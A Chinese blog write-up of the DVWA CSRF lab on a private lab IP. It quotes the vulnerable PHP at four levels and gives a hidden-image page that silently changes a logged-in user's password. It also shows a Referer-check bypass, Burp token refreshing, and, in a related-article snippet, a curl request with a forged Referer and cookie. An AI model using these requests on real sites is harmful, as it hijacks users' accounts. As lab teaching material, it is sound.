DVWA-CSRF

最新推荐文章于 2025-03-03 13:50:25 发布
最新推荐文章于 2025-03-03 13:50:25 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: web 文章标签: csrf web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Ga4ra/article/details/123362906
版权

文章目录

CSRF

之前的笔记:https://blog.youkuaiyun.com/Ga4ra/article/details/122060519

Low level

题目是一个修改密码的页面,修改密码点击提交,url如下:

/dvwa/vulnerabilities/csrf/?password_new=aaa&password_conf=aaa&Change=Change#

这个页面任意访问,就能修改密码了。

构造个页面:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <img src="http://10.10.10.156/dvwa/vulnerabilities/csrf/?password_new=bbb&password_conf=bbb&Change=Change#" border=“0” style=“display:none;”/>

    <h1>404<h1>
</body>
</html>

一旦访问这个页面,密码就会被改成bbb了。

当然必须得先登录,否则dvwaPageStartup()函数会跳转到登录页面。

看下源码,只是检查了password_new和password_conf一样即可修改。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
	// Get input
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Do the passwords match?
	if( $pass_new == $pass_conf ) {
		// They do!
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update the database
		$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
		$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

		// Feedback for the user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with passwords matching
		$html .= "<pre>Passwords did not match.</pre>";
	}

?>

Medium level

这次如果从空白页/恶意网站直接访问修改密码的url,则会回显That request didn't look correct.

看下源码,检查了referer字段:

// Checks to see where the request came from
	if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
		// Get input
		$pass_new  = $_GET[ 'password_new' ];
		$pass_conf = $_GET[ 'password_conf' ];

		//...
		}
		else {
			// ...
		}
	}

如果referer里有服务端hostname,则通过验证。

抓包看下字段

访问的url:

http://10.10.10.156/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#

Referer

Referer: http://10.10.10.156/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change

修改下源码:

echo $_SERVER[ 'SERVER_NAME' ];
echo "<br>";
echo $_SERVER[ 'HTTP_REFERER' ];
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
	//...
}

输出:

10.10.10.156
http://10.10.10.156/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change<!DOCTYPE html>

而从空白页访问url的时候,抓包是没有referer字段的,复制进去就可以修改密码了,当然实战中不能这么操作。一种绕过思路是,把low level里的html名称改成10.10.10.156.html。

High level

提交表单后url增加了user_token参数:

GET /dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change&user_token=e41ef3299708ca39e988d6e194a0e349 HTTP/1.1

也就是说加入了token检查,F12前端页面如下:

<form action="#" method="GET">
    New password:<br />
    <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
    Confirm new password:<br />
    <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
    <br />
    <input type="submit" value="Change" name="Change">
    <input type='hidden' name='user_token' value='e41ef3299708ca39e988d6e194a0e349' />
</form>

看下源码:

if ($change) {
	// Check Anti-CSRF token
	checkToken( $token, $_SESSION[ 'session_token' ], 'index.php' );

	// Do the passwords match?
	if( $pass_new == $pass_conf ) {
        //...
    }
    //...
}
generateSessionToken();


function generateSessionToken() {  # Generate a brand new (CSRF) token
	if( isset( $_SESSION[ 'session_token' ] ) ) {
		destroySessionToken();
	}
	$_SESSION[ 'session_token' ] = md5( uniqid() );
}

function checkToken( $user_token, $session_token, $returnURL ) {  # Validate the given (CSRF) token
	if( $user_token !== $session_token || !isset( $session_token ) ) {
		dvwaMessagePush( 'CSRF token is incorrect' );
		dvwaRedirect( $returnURL );
	}
}

单单抓包的话,可以使用bp的CSRF Token Tracker插件。添加规则:

host-> 10.10.10.156
name->user_token

然后抓包后发到repeater,无论发多少次,token都能自动刷新,返回password changed 响应。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oh4C9hhI-1646743782722)(CSRF.assets/BpCSRFTokenPlugin.png)]

Impossible level

Impossible级别需要先输入当前密码,而且查询数据库是用了PDO(PHP data object),防止sql注入。

<?php

if( isset( $_GET[ 'Change' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$pass_curr = $_GET[ 'password_current' ];
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Sanitise current password input
	$pass_curr = stripslashes( $pass_curr );
	$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass_curr = md5( $pass_curr );

	// Check that the current password is correct
	$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
	$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
	$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
	$data->execute();

	// Do both new passwords match and does the current password match the user?
	if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
		// It does!
		$pass_new = stripslashes( $pass_new );
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update database with new password
		$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
		$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
		$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
		$data->execute();

		// Feedback for the user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with passwords matching
		$html .= "<pre>Passwords did not match or current password incorrect.</pre>";
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>
DVWA-CSRF通关教程-完结
刘箫-技术库
03-28 1573
high级别的源码中加入了Anti-csrf token机制,由checkToken函数来实现,用户每次访问更改密码页面时,服务器会返回一个随机的token,之后每次向服务器发起请求,服务器会优先验证token,如果token正确,那么才会处理请求。既然参数是GET方式传递的,那么我们可以直接在URL链接中设置参数,如果用户用登陆过该网站的浏览器(服务器会验证cookie)打开这个链接,那么将直接把参数传递给服务器,因为服务器并没有CSRF的措施,所以直接可以攻击成功,密码将被改为123456。
DVWA-csrf
告白的博客
07-28 482
0x00 漏洞介绍 CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web应用程序,去执行并非用户本意的操作。 用户登录、浏览并信任正规网站WebA,同时,WebA通过用户的验证并在用户的浏览器中产生Cookie。 简单理解:将即将支付网址连接盗取,将伪造站点操作代码放在csrf伪造站点,当点击伪造站点自动
CSRF实践】DVWA靶场之CSRF实践
最新发布
weixin_40433003的博客
03-03 1084
CSRF(Cross-site request forgery),中文名叫做“跨站请求伪造”,也被称作“one click attack/session riding”,缩写为“CSRF/XSRF”。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,一但用户点击,攻击也就完成了。同“XSS”的区别在于,CSRF是借助用户权限完成攻击,攻击者并没有拿到权限;而XSS是直接盗取用户甚至管理员的权限进行攻击,从而造成破坏。
dvwacsrf
温和的跳跃
10-14 285
没有什么好玩的, 就把这个缩写记住了 cross site request 伪造。然后打算用bp 服务器模拟了一下。早点test完dvwa。 下图比较好玩。 哈哈哈哈哈哈哈哈哈哈 这和程序员新学一个语言或者框架写个helloworld很像。异曲同工 ...
DVWACSRF
RexHa的博客
09-30 8751
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWA-master.7z 压缩包
09-14
- 跨站请求伪造(CSRF):攻击者利用用户的已登录状态,诱使用户进行非预期的操作。 - 文件包含漏洞:允许攻击者将外部文件内容包含到应用中,可能导致代码执行或信息泄露。 - 弱认证与会话管理:不安全的登录机制或...
DVWA-master安装包
02-28
3. **跨站请求伪造(CSRF)**:攻击者诱导用户执行非预期的操作,比如更改密码或转账,因为请求看起来像是来自用户自己。 4. **文件包含漏洞**:当程序允许用户指定要加载的文件时,不正确的验证可能导致恶意文件被...
网络安全 - Web 安全靶场 - DVWA-2.3.zip
10-09
DVWA包含了如Brute Force(暴力破解)、Command Injection(命令注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)等多种安全漏洞模块。这些模块不仅提供了实践的机会,还附带了详细的漏洞描述和成因分析,...
DVWA-master.zip
01-04
除了上述常见漏洞外,DVWA还包括如“弱口令”、“CSRF(跨站请求伪造)”、“不安全的直接对象引用”等其他安全挑战,这些都为学习者提供了全面的安全训练。 7. **实践与挑战** 通过DVWA,你可以模拟黑客的攻击...
DVWA--CSRF
When you collect everything, you understand nothing.
09-16 656
0x00 CSRF介绍 CSRF,全称Cross-site request forgery,即跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作。 可以这样理解CSRF:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请...
DVWA——CSRF
weixin_51559599的博客
11-13 2083
这样解决了上种方法在请求中加入 token 的不便,同时,通过 XMLHttpRequest 请求的地址不会被记录到浏览器的地址栏,也不用担心 token 会透过 Referer 泄露到其他网站中去。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求。可以利用这一点漏洞,可以想办法在恶意网站的地址中添加带有 Web1 主机地址的字段。
dvwa csrf
gwl7878的博客
06-27 672
中级 curl -e "http://172.19.180.27/dvwa/vulnerabilities/csrf--Cookie "security=medium; PHPSESSID=8sfh17npgpajd0ikuh3"  --location "http://172.19.180.27/dvwa/vulnerabilities/csrf/?password_new=pass
DVWA CSRF
m0_73606240的博客
01-13 251
DVWA CSRF
dvwa-csrf
Alter__的博客
04-23 437
(元素可提供有关页面的元信息,比如针对搜索引擎和更新频度的描述和关键词) (关联css文件) (role充当什么角色nav?)
dvwa靶场csrf
12-29
### DVWA CSRF Vulnerability Walkthrough and Explanation #### Understanding CSRF in DVWA Cross-Site Request Forgery (CSRF) is a type of attack that tricks the victim into submitting a malicious ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值